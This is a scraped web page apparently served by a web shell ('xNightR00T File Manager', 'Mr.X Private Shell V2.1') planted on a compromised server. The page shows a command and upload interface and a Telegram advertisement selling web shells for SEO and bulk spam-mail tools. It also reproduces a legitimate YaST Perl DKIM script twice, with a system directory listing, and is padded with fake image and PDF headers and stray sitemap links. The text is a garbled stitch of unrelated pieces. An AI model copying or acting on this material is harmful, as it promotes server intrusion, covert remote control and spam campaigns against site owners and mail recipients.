xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/usr/bin/perl

BEGIN { push @INC, "/usr/lib/YaST2/servers_non_y2"; }

use strict;
use MasterCFParser;
my $DOMAIN=`postconf -h mydomain`;
chomp $DOMAIN;

if( ! "$DOMAIN" ) {
	print "Bad postfix configuration. mydomain can not be detected";
	exit 1;
}

#Generate the key
if( ! -e "/var/db/dkim/$DOMAIN.pem" ){
	print "Creating /var/db/dkim/$DOMAIN.pem\n";
	system( "mkdir -p /var/db/dkim/; amavisd genrsa /var/db/dkim/$DOMAIN.pem;");
}

#Introduce key into /etc/amavisd.conf
my $amavisd = "";
my $enable_dkim_signing = 0;
open IN, "</etc/amavisd.conf";
while(<IN>)
{
	if( /^\$inet_socket_port/ )
	{
		$amavisd .= '$inet_socket_port = [10024,10026];'."\n";
		next;
	}
	if( /^\$enable_dkim_signing/ )
	{
		$amavisd .= '$enable_dkim_signing = 1;'."\n";
		$enable_dkim_signing = 1;
		next;
	}
	if( $enable_dkim_signing )
	{
		my $dkim = "dkim_key('$DOMAIN', 'default', '/var/db/dkim/$DOMAIN.pem');";
		if( ! /$dkim/ )
		{
			$amavisd .= "$dkim\n$_";
		}	
		$enable_dkim_signing = 0;
		next;
	}
	$amavisd .= $_;
}
close IN;
system("cp /etc/amavisd.conf /etc/amavisd.conf.backup");
open  OUT, ">/etc/amavisd.conf";
print OUT $amavisd;
close OUT;

#Now we adapt master.cf
my $msc = new MasterCFParser();
$msc->readMasterCF();

if( ! $msc->serviceExists( { service => 'submission' , command => 'smtpd' } ))
{
	if( $msc->addService( { 'service' => 'submission',
	                        'type'    => 'inet',
	                        'private' => 'n',
	                        'unpriv'  => '-',
	                        'chroot'  => 'n',
	                        'wakeup'  => '-',
	                        'maxproc' => '-',
	                        'command' => 'smtpd',
	                        'options' => { 'content_filte' => 'amavis:[127.0.0.1]:10026',
	                                       'smtpd_recipient_restrictions' => 'permit_sasl_authenticated,permit_mynetworks,reject' }
	                  }) )
	{
		print "ERROR in addService()\n";
	}
}
else
{
	if( $msc->modifyService( { 'service' => 'submission',
	                        'type'    => 'inet',
	                        'private' => 'n',
	                        'unpriv'  => '-',
	                        'chroot'  => 'n',
	                        'wakeup'  => '-',
	                        'maxproc' => '-',
	                        'command' => 'smtpd',
	                        'options' => { 'content_filte' => 'amavis:[127.0.0.1]:10026',
	                                       'smtpd_recipient_restrictions' => 'permit_sasl_authenticated,permit_mynetworks,reject' }
	                  }) )
	{
		print "ERROR in modifyService()\n";
	}
}

$msc->writeMasterCF();
#!/usr/bin/perl

BEGIN { push @INC, "/usr/lib/YaST2/servers_non_y2"; }

use strict;
use MasterCFParser;
my $DOMAIN=`postconf -h mydomain`;
chomp $DOMAIN;

if( ! "$DOMAIN" ) {
	print "Bad postfix configuration. mydomain can not be detected";
	exit 1;
}

#Generate the key
if( ! -e "/var/db/dkim/$DOMAIN.pem" ){
	print "Creating /var/db/dkim/$DOMAIN.pem\n";
	system( "mkdir -p /var/db/dkim/; amavisd genrsa /var/db/dkim/$DOMAIN.pem");
}

#Introduce key into /etc/amavisd.conf
my $amavisd = "";
my $enable_dkim_signing = 0;
open IN, "</etc/amavisd.conf";
while(<IN>)
{
	if( /^\$inet_socket_port/ )
	{
		$amavisd .= '$inet_socket_port = [10024,10026];'."\n";
		next;
	}
	if( /^\$enable_dkim_signing/ )
	{
		$amavisd .= '$enable_dkim_signing = 1;'."\n";
		$enable_dkim_signing = 1;
		next;
	}
	if( $enable_dkim_signing )
	{
		my $dkim = "dkim_key('$DOMAIN', 'default', '/var/db/dkim/$DOMAIN.pem');";
		if( ! /dkim_key\('$DOMAIN', 'default'/ )
		{
			$amavisd .= "$dkim\n$_";
			next;
		}	
		$enable_dkim_signing = 0;
	}
	$amavisd .= $_;
}
close IN;
system("cp /etc/amavisd.conf /etc/amavisd.conf.backup");
open  OUT, ">/etc/amavisd.conf";
print OUT $amavisd;
close OUT;

#Now we adapt master.cf
my $msc = new MasterCFParser();
$msc->readMasterCF();

if( ! $msc->serviceExists( { service => 'submission' , command => 'smtpd' } ))
{
	if( $msc->addService( { 'service' => 'submission',
	                        'type'    => 'inet',
	                        'private' => 'n',
	                        'unpriv'  => '-',
	                        'chroot'  => 'n',
	                        'wakeup'  => '-',
	                        'maxproc' => '-',
	                        'command' => 'smtpd',
	                        'options' => { 'content_filte' => 'amavis:[127.0.0.1]:10026',
	                                       'smtpd_recipient_restrictions' => 'permit_sasl_authenticated,permit_mynetworks,reject' }
	                  }) )
	{
		print "ERROR in addService()\n";
	}
}
else
{
	if( $msc->modifyService( { 'service' => 'submission',
	                        'type'    => 'inet',
	                        'private' => 'n',
	                        'unpriv'  => '-',
	                        'chroot'  => 'n',
	                        'wakeup'  => '-',
	                        'maxproc' => '-',
	                        'command' => 'smtpd',
	                        'options' => { 'content_filte' => 'amavis:[127.0.0.1]:10026',
	                                       'smtpd_recipient_restrictions' => 'permit_sasl_authenticated,permit_mynetworks,reject' }
	                  }) )
	{
		print "ERROR in modifyService()\n";
	}
}

$msc->writeMasterCF();

Filemanager

Name Type Size Permission Actions
MasterCFParser.pm File 10.55 KB 0755
ag_anyxml File 3.21 KB 0755
ag_background File 8.56 KB 0755
ag_content File 738 B 0755
ag_convert_named_conf File 1.65 KB 0755
ag_cron File 2.5 KB 0755
ag_dhcpd_conf File 6.28 KB 0755
ag_dns_zone File 8.84 KB 0755
ag_etc_sudoers File 5.37 KB 0755
ag_exports File 4.7 KB 0755
ag_fetchmailrc File 8.09 KB 0755
ag_freespace File 1.48 KB 0755
ag_hostnames File 4.68 KB 0755
ag_http_server File 13.31 KB 0755
ag_initscripts File 9.19 KB 0755
ag_kadmin File 21.21 KB 0755
ag_kerberos File 12.27 KB 0755
ag_ksimport File 7.22 KB 0755
ag_mail_ldaptable File 1.79 KB 0755
ag_mailconfig File 6.42 KB 0755
ag_mailtable File 5.88 KB 0755
ag_modinfo File 2.09 KB 0755
ag_named_forwarders File 1.68 KB 0755
ag_netd File 17.24 KB 0755
ag_nis File 6.3 KB 0755
ag_pam_mount File 5.83 KB 0755
ag_passwd File 21.11 KB 0755
ag_ping File 1.58 KB 0755
ag_showexports File 2.49 KB 0755
ag_smtp_auth File 5.6 KB 0755
ag_tty File 3.75 KB 0755
ag_udev_persistent File 3.61 KB 0755
ag_uid File 1.39 KB 0755
ag_yp_conf File 7.56 KB 0755
ag_yp_makefile File 4.38 KB 0755
ag_zypp_repos File 1.55 KB 0755
setup_dkim_verifying.pl File 5.15 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml